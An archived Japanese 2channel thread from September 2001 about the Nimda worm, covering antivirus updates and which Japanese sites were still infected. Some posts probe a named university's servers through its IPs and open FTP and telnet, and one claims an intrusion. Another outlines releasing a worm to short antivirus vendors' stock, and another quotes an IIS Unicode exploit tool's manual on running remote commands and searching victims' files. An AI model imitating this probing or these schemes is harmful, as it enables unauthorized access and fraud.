>メルの送受信はしないで 安置ウイルスいんすと→ ネット繋いで安置を最新版にあっぷ

と、いいたいところだけど、ういるすばすたなどはメルでキーをもらわないと、最新版にアプできないよん。

745 :名無しさん@お腹いっぱい。:01/09/27 08:31
>>744
その点だけど、トレンドマイクロの場合は現在インターネット上で
最新の検索エンジンとパターンファイルを臨時(?)で配布している模様。

多分、ノートンも同様の措置をとっているかと思われ。

746 :名無しさん@お腹いっぱい。:01/09/27 09:56
>>742

このレベルなのに、中小企業などで強制的に鯖建立やらされて、やっとの思いで外から見えるようにした時点でちからつきているのに、システム管理者の烙印(wまで押されちゃったやつにはどうしてやったらよかんべ。

747 :名無しさん@お腹いっぱい。:01/09/27 10:05
>>679

今朝見たら、

宝塚造形芸術大学
http://www.takara-univ.ac.jp/
また見える。

夜は寝て、昼は起きる鯖になったもよう(^^;


そしてここに飛ばされる。
http://exchange.takara-univ.ac.jp/

しかしこのURLは一体なんだ?(^^;

748 :名無しさん@お腹いっぱい。:01/09/27 10:12
>>721-722

ヒュンダイきょうも閉まってら。
http://www.hyundaijapan.co.jp/
やはり昨日復旧→即再感染→ウマー(´Д`) となったと思われ。

749 :名無しさん@お腹いっぱい。:01/09/27 10:22
ネタにマジレスしてあまつさえ信じ込んでる629に誰も突っ込
まないのにワラタ

750 :名無しさん@お腹いっぱい。:01/09/27 10:36

はっきんぐから
>>466


夜のオカズまで
>>694-695


手広くカバーするこのスレは2ちゃんの縮図だな(^^;

751 :検索くん1号:01/09/27 11:30
ホスト名: DEC-Router.takara-univ.ac.jp
IPアドレス: 202.223.228.1
ホスト名: ns.takara-univ.ad.jp
IPアドレス: 202.223.228.2
ホスト名: FireWall-1.takara-univ.ac.jp
IPアドレス: 202.223.228.3
ホスト名: www.takara-univ.ac.jp
IPアドレス: 202.223.228.4
ホスト名: mail.takara-univ.ac.jp
IPアドレス: 202.223.228.5
ホスト名: Exchange.takara-univ.ac.jp
IPアドレス: 202.223.228.9
ホスト名: artinfo.takara-univ.ac.jp
IPアドレス: 202.223.228.20

752 :名無しさん@お腹いっぱい。:01/09/27 12:51
>>751

どうやら高くついたようだな>宝塚造形芸術大学 短期大学部

753 :名無しさん@お腹いっぱい。:01/09/27 12:59
なんだこりゃぁ?


Web View Browser
http://www.mcafee.com/myapps/utilities/ov_neoplanet.asp

これならニムダにも感染しないぞ、ってか?

754 :名無しさん@お腹いっぱい。:01/09/27 13:17
宝塚造形芸術大学 短期大学部

当大学ではコンピューターを使ったアーティストの自由な自己表現の1つとして作品名ニムダを展示しております。
決して何も解っていないコンピューターオタ達の言うワームの感染ではありません。

と開き直れ。

755 :名無しさん@お腹いっぱい。:01/09/27 13:23
>>751

感染後にあわてて業者に対策させたのだろうが、

Exchange.takara-univ.ac.jp

このへんですでにダマされてると思われ・・。

756 :名無しさん@お腹いっぱい。:01/09/27 13:24
>>754

そうだ、表紙にニムダ配布の事実を伝えろと抗議すべきだ

757 :名無しさん@お腹いっぱい。:01/09/27 13:36
http://www.hotwired.co.jp/news/news/business/story/20010925104.html

うちのCATV屋もやってくれ・・。

758 :名無しさん@お腹いっぱい。:01/09/27 13:47
>>751

あれえ?

ρ(^-^)ここにいくと
202.223.228.4
画像もちゃんと表示される。

ρ(^-^)ここにいくと
www.takara-univ.ac.jp

202.223.228.2
を見て、

Exchange.takara-univ.ac.jp
にすぐ飛ばされる。画像が表示されない。

ρ(^-^)ここにいくと
202.223.228.9
画像が表示されない。

なんか設定まちがってない?(^^;



あれ?今www.takara-univ.ac.jpに行くと・・・?

めちゃくちゃだぁΣ<(゜▽゜;)>

759 :名無しさん@お腹いっぱい。:01/09/27 13:55
>>757
日本じゃ無理だな・・・

760 :名無しさん@お腹いっぱい。:01/09/27 14:44
>>759

どうみても自分の使ってるCATV屋の、他のユーザーからの攻撃がくるのよ・・。

761 :名無しさん@お腹いっぱい。:01/09/27 15:05
>>760
なぜ貴方はそう思ふのか

762 :名無しさん@お腹いっぱい。:01/09/27 15:11
はきーんぐやら、わーむやら、日本のサイトってけっこうやられてるんだ・・。
http://people.site.ne.jp/2001/2001.html

763 :名無しさん@お腹いっぱい。:01/09/27 15:14
ニムダをWin機からアップ?放置?
http://www.conet-nagano.gr.jp/

764 :名無しさん@お腹いっぱい。:01/09/27 15:28
IE5.5をSP2にアップグレードしたんだけど、
その後Webを見ていたら、
3回もノートンでNimdaが検出された。
SP2にアップグレードしただけじゃ、対策にならないのかなぁ

765 :名無しさん@お腹いっぱい。:01/09/27 15:29
202.223.228.4
のヘッダIIS/3.0?

HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Thu, 27 Sep 2001 **:**:** GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 18 Sep 2001 00:32:00 GMT
Content-Length: 26923

202.223.228.9
のヘッダ一応Apache

HTTP/1.1 302 Found
Date: Thu, 27 Sep 2001 **:**:** GMT
Server: Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.1pl2 mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24
Location: http://exchange.takara-univ.ac.jp/
Connection: close
Content-Type: text/html; charset=iso-8859-1

766 :名無しさん@お腹いっぱい。:01/09/27 15:48
http://www.hotwired.co.jp/news/news/technology/story/20010920301.html
LaBreaってなんか面白そうだね。

767 :名無しさん@お腹いっぱい。:01/09/27 15:49
>>765

Server: Apache/1.3.12 Cobalt (Unix)
202.223.228.9
は画像が出ないよね。

つまりあれかい、Cobalt Qubeに移そうとして挫折してる、と(^^;

768 :名無しさん@お腹いっぱい。:01/09/27 15:54
>>766
んだなや。だれかWinに移植してくれんかのう。

769 :名無しさん@お腹いっぱい。:01/09/27 15:56
>>766
インストールしたよ。でもまだ1匹も捕まえてない。
最近アクセスも少ないし。。。。

770 :名無しさん@お腹いっぱい。:01/09/27 16:07
>>753

入れたさ(´。`;)

http://211.11.222.51/
ここ行ったさ。

だまってダウンロードしちゃうさ┐(´ー`)┌

771 :名無しさん@お腹いっぱい。:01/09/27 16:14
>>767
挫折というか放置というかデフォ状態って感じ。
ついでにFTP,TELNET共外部からのアクセスを許可してる。
メルサバも第三者中継許可してるんじゃないだろうな。アフォー

772 :名無しさん@お腹いっぱい。:01/09/27 16:15
今日現在も・・。

http://www.d-link.co.jp/

ソースもみてね。

773 :名無しさん@お腹いっぱい。:01/09/27 16:20
>>771

ftp://202.223.228.9/

ホントだ! こばるとのftpのデフォルトアカウントってなんだっけ?(ぉぃ

774 :名無しさん@お腹いっぱい。:01/09/27 16:30
>>771

つまり、宝塚造形芸術大学 短期大学部によって

875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

は証明されたと・・(´。`;)

775 :名無しさん@お腹いっぱい。:01/09/27 16:35
>>769

ぜひ試してみてくださいm(_ _)m

---
>>643

>>641
> というか、それ狙ってくる。

あ、それってこれと関係あります?

158 名前:ん〜ま 投稿日:01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったw

776 :名無しさん@お腹いっぱい。:01/09/27 16:52
>>773

Telnet://202.223.228.9

あははははは、あは、あは、あは・・・。

777 :名無しさん@お腹いっぱい。:01/09/27 17:01

te○net://210.151.237.34

ぷっ。ひでー

778 :ワーム作って金持ちになる方法:01/09/27 17:06
わくちん屋の株を空売り

そのわくちん屋の名前が含まれたワームをばらまく

わくちん屋の株 暴落

株を買い戻して大儲け!

名前でなくて、その会社の持っているIPアドレスとを「攻撃し
ないアドレス」として仕込んだ方がそれっぽいかもね。ワーム
を解析して行くうちに「なんだこりゃ」という騒ぎになるよう
に計算して作る。

わくちん屋が「俺じゃない」と言っても「調査研究の為にワー
ムを作っているうちに、間違って流出させてしらんぷり」と思
われて、簡単に容疑は晴れない。必死に言い訳するほど逆効果。

わくちん屋じゃなくても、同じことはできるけどね。わくちん
屋をターゲットにするのが一番効果的。

新発見のセキュリティーホールを公開するのと同じ理屈で書い
てみたよ。関係者のみなさんは「犯人は俺じゃない」と言うた
めにはどしたらよいか、今のうちに考えておいてね。

779 :名無しさん@お腹いっぱい。:01/09/27 17:10
>>777

おいおい(w

780 :名無しさん@お腹いっぱい。:01/09/27 17:17
>>777
侵入成功

781 :名無しさん@お腹いっぱい。:01/09/27 17:19
>>777

これって・・。

782 : :01/09/27 17:21
>>777

試しちゃったじゃねーか (゚д゚)マズー

783 :おいおい:01/09/27 17:38
こういうの試してるとこんなふうになるんじゃねーの?
http://www.asahi.com/national/update/0927/019.html

784 :名無しさん@お腹いっぱい。:01/09/27 17:50
>>783

PとD見間違えてるぞ。メガネかけろ。

785 :名無しさん@お腹いっぱい。:01/09/27 17:59
>>783
いやその前にこうなる。キーワードは「煮ちゃんねる」(w
http://www.asahi.com/tech/feature/K2001092300440.html

786 :783:01/09/27 18:02
なに、警鐘を鳴らしたまでのことだ。
PとかDとか細かいことは気にすんな。

787 :名無しさん@お腹いっぱい。:01/09/27 18:11
777 = 783 て?(w

788 :名無しさん@お腹いっぱい。:01/09/27 18:14
>>785
それはあるなー。
実際、海外のIPだの、 .com .net だのがたたけない会社、知ってる(^^;

789 :名無しさん@お腹いっぱい。:01/09/27 18:27
IE6のプレビュー使ってたんだけど、どうなんだろ、これ。
やばそうだからuninstallしようと思ったらできないよ、これ。
仕方がないから、IE6を標準構成でinstallしようと思ったら、ディスク容量がたらんっていわれたよ。
しゃーないから、ディスク整理して、キャパ空けたよ。んで、installしたよ。
で、すぐにoutlookをuninstallしたけど、大丈夫なんだろうか?
その他諸々の付属品もuninstallしたいけど、どーなんだろ、これ。

790 :名無しさん@お腹いっぱい。:01/09/27 18:28
http://wtc.trendmicro.com/wtc/
http://wtc.trendmicro.com/wtc/report.html
痛い。全体的には減っているが昨日に比べてアジア(ニッポソ)のアタックだけが増加中。
何事も遅いニッポソ。

791 :名無しさん@お腹いっぱい。:01/09/27 18:49
べつに逮捕されてもいいよ。
不要なパケットを垂れ流して放置してるやつこそ社会の敵だ。

792 :名無しさん@お腹いっぱい。:01/09/27 19:32
確かパスワードデフォルト垂れ流しはタイーホされなかったような気がする。
法律勉強したいなぁ。

793 :名無しさん@お腹いっぱい。:01/09/27 19:38
>>792
金銭的や、物的、社会的損害を受けない限り頼んでも警察なんて動いてくれないよ(´Д`)

794 :名無しさん@お腹いっぱい。:01/09/27 19:41
>>790 ニポン,カコワルイ(´Д`)

795 :名無しさん@お腹いっぱい。:01/09/27 19:43
悩屯先生、またあたらしいパターンファイル出てるぞー。

796 :名無しさん@お腹いっぱい。:01/09/27 19:54
ニムダの世の中になってから、ノートン先生の最終ウイルス検知日がいつ見ても0日前・・。

797 :名無しさん@お腹いっぱい。:01/09/27 19:59
>>790
ニムダの検出は現在日本が世界一だ・・。

798 :名無しさん@お腹いっぱい。:01/09/27 20:03
ニムダなんじゃねーの?(w

http://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all

<ソニー銀行>システムに障害 口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。

799 :名無しさん@お腹いっぱい。:01/09/27 20:32
qchainぐらいは知って置いた方が良いかも。
ServerだけじゃなくてProにも使えるよん。
http://www.port139.co.jp/ntsec_hotfix.htm

800 :名無しさん@お腹いっぱい。:01/09/27 21:38
age

801 :名無しさん@お腹いっぱい。:01/09/27 21:48
で Nimda にやられたW引導sマシンはどうやったら
remoteからshutdownできるの?できればスクリプトきぼんぬ

802 :名無しさん@お腹いっぱい。:01/09/27 21:56
>>790
>>797
っていうか、それトレンドマイクロのオンライン・ウィルス・スキャンや製品
で発見された数がベースでしょ。

トレンドマイクロの主要市場が日本と台湾、北米なんだから、そこに偏っ
て当然と思われ。

それともトレンドマイクロがマカフィやシマンテックみたく、アメリカの会社
と信じてたの?

803 :名無しさん@お腹いっぱい。:01/09/27 22:03
>>802

うんにゃ。18日ごろは北米のほうが遙かに多かったのだ。

804 :名無しさん@お腹いっぱい。:01/09/27 23:15
age

805 :(==):01/09/27 23:36
>>744
安置ういるすインストに、オンライン登録も含む、、だったのでし
だから、める設定がさきになってんだ〜。
ま、先にIEupdateしとっから、ここまできぃつけんでもええかとは思ったんだが
気分の問題(w

806 :名無しさん@お腹いっぱい。:01/09/27 23:43
>>805
www.antivirus.com/download/pattern.asp
で最新版のパターンをDLしてくれば登録しなくても平気だよ。

検索エンジンのアップデートは、
www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm

807 :名無しさん@お腹いっぱい。:01/09/27 23:48
>>806

新規で買ってきたときはだめづら。そもそも、そのための >>742 では。

808 :名無しさん@お腹いっぱい。:01/09/27 23:50
>>803
日本で対策が遅れているのは、21日にIPAが収束宣言を出したため。

http://www.mainichi.co.jp/digital/netfile/archive/200109/21-1.html
IPAは「届け件数の伸びから考えると被害は収束する方向にある」と分析している。
IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件
(午後4時30分時点)、翌20日は65件(同)だった。今年7月に全国的に被害の遭った「サーカム」
は11日間で700件を超えたケースと比較すると被害は少ないと見ている。

809 :名無しさん@お腹いっぱい。:01/09/27 23:51
>>808

おおお、漏れもそう思う。激しく同意!>日本で対策が遅れているのは

810 :名無しさん@お腹いっぱい。:01/09/27 23:59
>>806
つかこれ、最新パターンにならないやん>とれんどマイ糞

811 :名無しさん@お腹いっぱい。:01/09/28 00:01
>>808
まだこんなのあるしな。

http://211.11.222.51/

812 :名無しさん@お腹いっぱい。:01/09/28 00:14
最近買った雑誌のオマケIE5.5は行進バージョン0のばっかでした。
っていうか何台もいちいち電話かけてつなげにいくの大変なんだけど‥‥。
SP2のが付いる雑誌情報きぼんぬ。
月刊ヤフーみたいのとNetなんとか(ナビ?)って雑誌はチェック済み
(両方10月号)

813 :名無しさん@お腹いっぱい。:01/09/28 00:15
>>812
雑誌社に責任を問おう

814 :名無しさん@お腹いっぱい。:01/09/28 00:36
>>807
新規で買わずに、体験版で十分。
内容は同じで、シリアル番号を入力するかしないかの違い。
体験版では新しいパターンに更新できないようになってるが、806から
ダウンロードすれば更新できる。
更新方法については、
//inet.trendmicro.co.jp/contents/download/ptnupdate.txt
を参照のこと。

815 :名無しさん@お腹いっぱい。:01/09/28 00:37
>>812
>っていうか何台もいちいち電話かけてつなげにいくの大変なんだけど‥‥。

????????

816 :名無しさん@お腹いっぱい。:01/09/28 00:39
ただ閉じてるだけのところ、日本には山ほどあるよね。

http://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/

このへんが復活したらどうなるんだろう。 嵐が収まったから玄関あけよう、みたいなところも多いような・・。

こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp

10月再開って、なんか目途があるんだろうか。
http://www.with9.com/

817 :名無しさん@お腹いっぱい。:01/09/28 00:40
>>812
セットアップフォルダピーコしろよ…

818 :名無しさん@お腹いっぱい。:01/09/28 00:42
>>814

んだから806に置いてるパターンがすでに古いやん>とれんどマイ糞

819 :名無しさん@お腹いっぱい。:01/09/28 00:44
>>814
VOTE喰らって氏ね。

820 :名無しさん@お腹いっぱい。:01/09/28 00:49
>>806

http://www.antivirus.com/download/pattern.asp
デッドリンク

http://www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
パターン古い

806はネタ

821 :ScriptKiddddy:01/09/28 01:12
ボクの大好きボタン1発ツールなのら〜!
[XXExploit ]
・・is a program that will search for the Uni Code Exploit
In Microsoft IIS servers.
If the exploit is found, the program will then attempt to connect giving you
the right to execute DOS commands.

も一つ。
[IISXXXXX]
・・・・
Now press the "Query Server" button and then the program will do some
magics and show you the name of the server that is running on that machine.
look at the status screen. If you see Microsoft-IIS 4.0 or IIS 5.0 this is
good , then it will tell you can the server be exploited or not.

Go to "Upload Files" Tab, the first object is "Remote Dir"
this means where files must be upoaded to ( the Path to it on
the victims computer ).

Directory Listing
-----------------
3. Here is not many things to explain, you just need to write the path that you
want to check for files at the "Directory" stirig , and it will show you the files
that located on that path. Example : C:\winnt will show you all the files and
directories that located at the Windows NT folder. If you need to list files in long name
dirs you can use dos style like: c:\progra~1\common\ (c:\program files\common\) or
you can put all the path in brakets (" ") like: "c:\program files\common"

Now we go forward and study how to searh for files.
It's easy just after dir path enter + and /S parameter.
For example this command: "c:\CCs\*.mdb+/S" will search for all *.mdb files
in c:\CCs\ directory. Including all sub directories.
* If you will search for c:\*.* - it will give you all files and their path in c:\
* Such search method is slow (dependin on server speed)
* Dont Forget to click "List Files" button . =)
- This software is provided "AS IS", and you, its
user, assume the entire risk as to its quality and
accuracy.

822 :名無しさん@お腹いっぱい。:01/09/28 08:10
>>760
どうみても自分の使ってるCATV屋の、他のユーザーからの攻撃がくるのよ・・。

>>761
> なぜ貴方はそう思ふのか

24.19.79.215
こやつがポートスキャンしてくるのだが、

@Home Network (NETBLK-ATHOME) ATHOME 24.0.0.0 - 24.23.255.255
@Home Network (NETBLK-BB1-RDC2-TX-11) BB1-RDC2-TX-11 24.19.64.0 - 24.19.79.255

これは、うちのプロバイダー(ケーブルテレビ屋)なのだ。

823 :名無しさん@お腹いっぱい。:01/09/28 08:20
ウリナラの仕業だニムダ!

824 ::01/09/28 08:46
>>669
ここの問題のページはなくなって
"セキュリティー確保の為、しばらく落札情報は停止いたします。ご了承ください。"
だって。。
騒動が収まることがセキュ確保と思ってないことを祈る!

825 :名無しさん@お腹いっぱい。:01/09/28 09:38
>>823

ここにニムダが紛れ込んでいたのも、
http://www.hyundaijapan.co.jp/

>>ウリナラの仕業だニムダ!

826 :名無しさん@お腹いっぱい。:01/09/28 09:39


    うゎ〜ん。ニムダに感染しちゃったよー。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            Λ_Λ
          ( ゜∀⊂ヽ ニヤリ
          ⊂    ノ
           人  Y
          し (_)

827 :名無しさん@お腹いっぱい。:01/09/28 09:40
ニダウイルス


     ∧∧
    <`∀´>
     ≡
  /\≡/\
     │

828 :名無しさん@お腹いっぱい。:01/09/28 09:59
定点観察

http://www.takara-univ.ac.jp/
http://202.223.228.5
閉鎖中

http://Exchange.takara-univ.ac.jp
http://202.223.228.9
画像なしの不完全表示

http://202.223.228.4
正常表示

Telnet://202.223.228.9
(ぉ

ftp://202.223.228.9/
(ぅ

以上、今朝の宝塚造形芸術大学 短期大学部



http://www.hyundaijapan.co.jp/ は正常復旧したものとみて観察終了

829 :名無しさん:01/09/28 10:27
>>811
>http://211.11.222.51/

これ、なに?

http://www.oishiine.co.jp/

は直ってるみたいだけど…

830 :名無しさん@お腹いっぱい。:01/09/28 11:00
>>829

http://www.oishiine.com

これと関連はあるのか?

831 :名無しさん@お腹いっぱい。:01/09/28 11:16
>>829

対策されたみたいだね。

かわりにこれとか。
http://www.bee.woodland.co.jp

832 :名無しさん@お腹いっぱい。:01/09/28 11:27
ふ〜ん・・・
ttp://www.zdnet.co.jp/news/0109/28/e_nimda.html

833 :名無しさん@お腹いっぱい。:01/09/28 13:11
     うわ〜ん、感染から10日たったよ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            Λ_Λ
          ( ゜∀⊂ヽ ニヤリ
          ⊂    ノ
           人  Y
          し (_)
http://www.zdnet.co.jp/news/0109/28/e_nimda.html

834 :名無しさん@お腹いっぱい。:01/09/28 13:52
しかしなんだねぇ。

お気楽管理者としては自分のマシンからのポートスキャンとかが検知できて、くい止めたり告知するようなのがほしいだろうねぇ。

中小企業でも買える1万円以下の。

835 :名無しさん@お腹いっぱい。:01/09/28 14:08
ゆうべ ノートンも バスターも パターンファイルが新しくなっていたので、更新した。

が、ノートンはきょう昼ごろまた新しくなっていた(@@〜☆

836 :ななしさん:01/09/28 14:13
http://www.zdnet.co.jp/news/bursts/0109/21/people.html
中国一号って名前けっこう気に入った。
でもなんで一号?
ところでnimdaってのは発見者がつけた名前なの?adminの逆というのは
あちこちに書いてあるけど、なんでこうしたと書いてあるところ
が見つからない。

837 :名無しさん@お腹いっぱい。:01/09/28 14:26
>>833

きょうで、ニムダ関連の各種緊急配布を終了するところが多いらしい。

お試し版の入手を検討しているひとはおはやめに。
https://www.netsecurity.ne.jp/article/1/2908.html

http://www.symantec.co.jp/region/jp/sarcj/defs.download.html
(最新に更新前)
http://www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
(すでにふるい)

838 :やまもとたかお:01/09/28 14:27
日本コンピュータウィルス学会の見解では「韓国1号」になってますが、、、

839 :名無しさん@お腹いっぱい。:01/09/28 14:30
まだ感染してるよ・・。

我社の特徴
ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm

840 : :01/09/28 15:45
昨日、うちのサーバがapnicのサーバからnimda攻撃されていた。

841 :名無しさん@お腹いっぱい。:01/09/28 15:52
>>833
わーい。再感染者爆発だー。

842 :名無しさん@お腹いっぱい。:01/09/28 16:17
>>840

まじ?攻撃してきた鯖のIP公開されたし。

843 :名無しさん@お腹いっぱい。:01/09/28 16:28
>>841
わーい
http://japan.cnet.com/News/2001/Item/010928-2.html?mn

844 :名無しさん@お腹いっぱい。:01/09/28 17:06
再感染警戒age

845 :1:01/09/28 17:50
その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

846 :名無しさん@お腹いっぱい。:01/09/28 17:58
>>845
ひまだねえ。

つーかageのあとに「その画像ならココ」もないもんだが。
しかし、いつもそのあとにすぐフォロー入れる漏れもヒマだねぇ・・。

847 :名無しさん@お腹いっぱい。:01/09/28 17:59
>>846

リンク色変わってるしな σ(--;

848 :名無しさん@お腹いっぱい。:01/09/28 18:16
ttp://www.bee.woodland.co.jp
mailto:k-b-homepage@wit.ne.jp
未対策、感染放置、ひどいもんだ。

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 28 Sep 2001 **:**:** GMT
Content-Type: text/html
Set-Cookie: ********************=************************; path=/
Cache-control: private

849 :名無しさん@お腹いっぱい。:01/09/28 18:43
ねーねー。うちの会社のネットワークおかしくなってるんだけど
ニムダ活動再開か??

他に同じ人いる? インターネットつながらないからダイアルアップ
でつないでるんだけど

850 :名無しさん@お腹いっぱい。:01/09/28 18:47
>>848
つまり、だれも管理してない、ってことなんだろうか・・・。

>近畿文化体系策定協議会内 実行委員会

まあそうなんだろうな(--;

851 :名無しさん@お腹いっぱい。:01/09/28 18:50
>>850

らすとあっぷでーと  2001/2/19(MON)

( ̄△ ̄;

852 :名無しさん@お腹いっぱい。:01/09/28 18:54
>>849

MSNが感染したのが18日の午後11時ごろ。
そんなに早く感染したヒトいるのかなぁ。

単なる駆除もれと思われ。

853 :名無しさん@お腹いっぱい。:01/09/28 18:56
漏れは2000なんだけど、感染したときはLANでTCP/IP使うとブルーバックになって落ちた。

ダイヤルアップはつながった。

854 :名無しさん@お腹いっぱい。:01/09/28 19:00
海外Nimda感染サイト情報
ttp://www.clubtgp.com/freehosting/teeny/kat/index.htm

855 :849:01/09/28 19:10
パケットモニタリングしてみた。
今まで静かだったのに、やっぱり一斉に80ポートへの攻撃始まってるぅ。

駆除漏れか?駆逐したと思うが、漏れてたのか。鬱だ氏脳

http://www.zdnet.co.jp/news/0109/28/e_nimda.html
http://japan.cnet.com/News/2001/Item/010928-2.html

10日後、活動開始と書いてるが、時間的には少し早い気もするしなぁ。。

856 :名無しさん@お腹いっぱい。:01/09/28 19:20
>>855

む?10日後って、感染240時間後ってことじゃなくて、アメリカ時間の10日後ってことか!?

てことはええと日本の夜11時が、東部時間でたしか朝7時だったよな?

もう今、圏内じゃんΣ<(゜▽゜;)>

857 :名無しさん@お腹いっぱい。:01/09/28 19:25
活動再開もなにも18日から一度も攻撃がこなかったことはない。
休止してないんだから再開もクソもねーよ。
ふざけるな。

858 :名無しさん@お腹いっぱい。:01/09/28 19:29
>>857
時間差で感染してるんでしょう。ご愁傷summer.

859 :名無しさん@お腹いっぱい。:01/09/28 19:34
>>857
あんた昔CodeRedとか感染しなかった?(w

860 :名無しさん@お腹いっぱい。:01/09/28 19:44
>>859
はあ?IIS鯖たててないけど。

861 :名無しさん@お腹いっぱい。:01/09/28 19:46
>>857
漏れはCATV屋の固定IPアドレス2つ持ってるんだけど、一方は先月CodeRedに感染したんだ。IIS搭載のW2k。

もう一方はW98で、こちらは無感染。

駆除後W2kの方に攻撃がやたらきて、一時接続不能になったんで、そっち(感染IP)をW98に、無傷IPをW2kにした(振り直した)んだ。

そしたら18日以降、W98のほう(感染IP)に狂ったようにポート攻撃が来て、昨夜時点でも1時間で4〜5件、そんなカンジ。
が、W2kはIP交換以来(現無傷IP)ポート攻撃は19日の朝1回と、今朝(28日)の2回きり。

これだけちがうのよ(w


あと、>>>>643 も参考にしてね。

862 :名無しさん@お腹いっぱい。:01/09/28 19:54
>>857
IP的に近所に感染鯖がいるんだyo!

863 :名無しさん@お腹いっぱい。:01/09/28 20:26
age

864 :名無しさん@お腹いっぱい。:01/09/28 21:04
http://wtc.trendmicro.com/wtc/report.html
アジア方面の割合が半分ぐらいまでに減った。
ニムダはメール攻撃に移行するとパケット攻撃を減らすかしなくなるのかな?

865 :名無しさん@お腹いっぱい。:01/09/28 23:12
>>864
周辺でさーかむが流行っているのが不気味だ・・。

866 :名無しさん@お腹いっぱい。:01/09/28 23:13
>>864
日本では以前に比べてえらくJSにむだが増えてるじゃないか・・。

867 :名無しさん@お腹いっぱい。:01/09/28 23:17
>>866
そりゃ、漏れがカキコで貼りまくってるから。。。板に。

868 :名無しさん@お腹いっぱい。:01/09/28 23:20
>>855
最近のパターンファイルは流行当時とニムダへの対処がちがうぞ。
アップデートしたものであらためてスキャンしたほうがよいと思われ。

869 :名無しさん@お腹いっぱい。:01/09/28 23:22
>>867
それ踏むようなのがVBオンラインスキャンはしないと思われ(w

870 :名無しさん@お腹いっぱい。:01/09/28 23:32
>>866
放置サイトには何言ってもムダか。
だったらネットワークから切断してもよかろうに。

871 :名無しさん@お腹いっぱい。:01/09/29 00:17
>>870
いろいろやってシャットダウンに成功しても、翌日そのまま再起動された例もあるぞ。

872 :名無しさん@お腹いっぱい。:01/09/29 00:18
>>870
どうせねすけかなんかで開発していて、自分ではういるすだうんろーどダイアログも開かんのだろう。

873 : :01/09/29 00:28
フォーマットしてまえ。

874 :名無しさん@お腹いっぱい。:01/09/29 00:31
>>873
感染前の状態に復元されるだけだぞ(w

875 :名無しさん@お腹いっぱい。:01/09/29 00:37
disconnect -RJ45 -forever
なんてコマンドは無いのかね?

876 :名無しさん@お腹いっぱい。:01/09/29 00:38
>>875
作ってFTPでアプすれば?

877 :名無しさん@お腹いっぱい。:01/09/29 01:12
近い将来、CodeRedやNimdaのようなクソパケットにインターネット
全体が占領されそうだな。
巨大pingを飛ばしまくるワームとか出来て・・・

878 :名無しさん@お腹いっぱい。:01/09/29 01:14
http://www.takara-univ.ac.jp/
復帰してる。
と思ったら202.223.228.4サーバーにDNSを割り当てただけだった(薬
感染マシンは廃棄か?

765 :名無しさん@お腹いっぱい。 :01/09/27 15:29
202.223.228.4
のヘッダIIS/3.0?

HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Thu, 27 Sep 2001 **:**:** GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 18 Sep 2001 00:32:00 GMT
Content-Length: 26923

879 :名無しさん@お腹いっぱい。:01/09/29 01:17
なんだこれ?

2001-09-20 04:03p 667,648 V3nimda.exe

感染マシンで見つけたんだけど。

880 :しつもん:01/09/29 01:20
ここにいるひとたちは、たいほされないんですか?

881 :名無しさん@お腹いっぱい。:01/09/29 01:23
ここにいる人たちの中に、お前は含まれるのか?

882 :良い子は寝る・・・:01/09/29 01:25
 

883 :名無しさん@お腹いっぱい。:01/09/29 01:33
NTインストール中にNimdaに感染した。

インストール中ってネットに接続しちゃいけないの?

884 : :01/09/29 01:36
Adminアカウント確定するまでの間 無防備にならない?

885 :名無しさん@お腹いっぱい。:01/09/29 01:38
不況だから逮捕もいいかもな(w

886 :名無しさん@お腹いっぱい。:01/09/29 01:42
>>883
それだと永遠に最新版にアップデートできないね(w
いけないってことはないと思うよ。

887 :名無しさん@お腹いっぱい。:01/09/29 01:45
ちゃんと読んだとは言えないんですが、
>>46から進展はあったのでしょうか。

僕の場合、
OEをはずしている(アンインストールはしていないが
ディレクトリ内のファイルの拡張子をexea、dllaなどに変えている)。
Java、ActivXを切っている。
エクスプローラーのWeb表示を切っている。
これだと感染はしないんですか?

すいません。アンチウイルスソフトが古くて(プレ版マカフィー)、>>811のサイトに行っても
何も警告してくれなかったのもので。
ただ、ダウンロードのダイヤローグとかWMPとかが出てきたりとかはしていません。

888 :名無しさん@お腹いっぱい。:01/09/29 02:54
>>880
大丈夫。
任意で話聞かれただけだから。

889 :名無しさん@お腹いっぱい。:01/09/29 03:06
ああ、やっぱり時限式だったのね。
日付を見てるから、なにかやってると思った。
そうすると感染日から10日って事かな。
時、分、秒などは見ていないようダス。

890 :名無しさん@お腹いっぱい。:01/09/29 08:04
>>887

> すいません。アンチウイルスソフトが古くて(プレ版マカフィー)、>>811のサイトに行っても
> 何も警告してくれなかったのもので。

そこからきたのかもしれないけど、

http://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100
も、チェックね>摩訶フィー ユーザー

